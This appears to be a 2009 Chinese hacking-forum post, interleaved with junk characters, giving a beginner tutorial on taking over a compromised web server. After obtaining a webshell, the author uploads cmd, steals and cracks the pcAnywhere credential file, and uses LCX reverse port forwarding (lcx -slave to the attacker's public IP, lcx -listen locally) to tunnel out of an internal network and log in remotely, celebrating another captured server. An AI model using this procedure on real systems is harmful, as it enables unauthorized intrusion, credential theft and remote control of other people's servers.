|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
) N/ e: e2 a0 N" b
* A* A: n( ^# T. C6 Y# r5 n提权方法:pcanywhere+LCX( {/ E- {0 m9 J# F$ B6 b
+ d" I5 a, z: `2 A% e7 K- ~1 G% C获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。% D% T# h. X! w! w) Q! Z
/ w* N8 f$ U+ t" R, R在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。# E3 a3 |' i* n6 i2 W, U0 E
1 P/ i' S2 o. V& c
* p" }+ r: m# ?查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
3 y2 Z8 C: \7 w% j7 q& a5 {" Z* |) n4 n% J7 P' q
* R! f* m' P, B3 s* t* J呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
+ c/ W- Z" Y5 ?3 P' L A9 x- x
$ [; L8 m. b; i3 ^& P0 C" V& @6 T2 A- Y/ d3 n) K1 `* Z, E- x
" _/ i- L- E* r* {# C
! k s' g3 x& H( c+ r; |7 H由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``2 Z5 T, s* o. D5 k
7 `$ k" a9 @ c5 F3 S! }% L# l; ^3 _+ [8 Z9 a
LCX的用法再简单说下:
. c. X# @3 c, O5 D, b Y9 l; V0 x+ Z+ q( w- H9 q
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)$ i: M1 }6 y: o: X/ b) r
$ {7 ?! j6 R+ n8 w3 D
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口), p' s; I4 x3 b9 R
) M' U& A2 @5 G7 L6 F
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
2 v, w# ]6 b4 n, [# u, V9 g% y" I顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``6 q/ P6 U4 I, w/ }
8 O8 }% s2 U' }8 w; N( I% o+ F& I
4 \6 M7 Y6 L X9 c1 {0 M) Q' q
6 L$ I2 n' X3 |& E" V
4 \: p$ V: j: B) W" p0 i" ^呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。. u& [! q% w9 m+ o5 K
9 s- B0 @; h3 c! S" @0 ~6 ~& e% z7 S. e' d6 j
% W8 w. b$ V* `& L" U; u& @
7 ~4 @$ o1 h7 |9 V! Z' L0 W我们本地连接试试,输入我们刚破解的账号密码
$ Q1 J: y: x" M$ t- r
. V1 O# H( x% [& T: q! l4 p- o, m& N2 q3 V) z
呵呵``连接成功,服务器不错,又一个8核^︵^
2 O) c8 h/ e) k4 u6 W
1 Z/ w# }9 U$ _# v0 q8 x1 Q$ M% E$ [5 `
u$ b$ X4 S, y
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
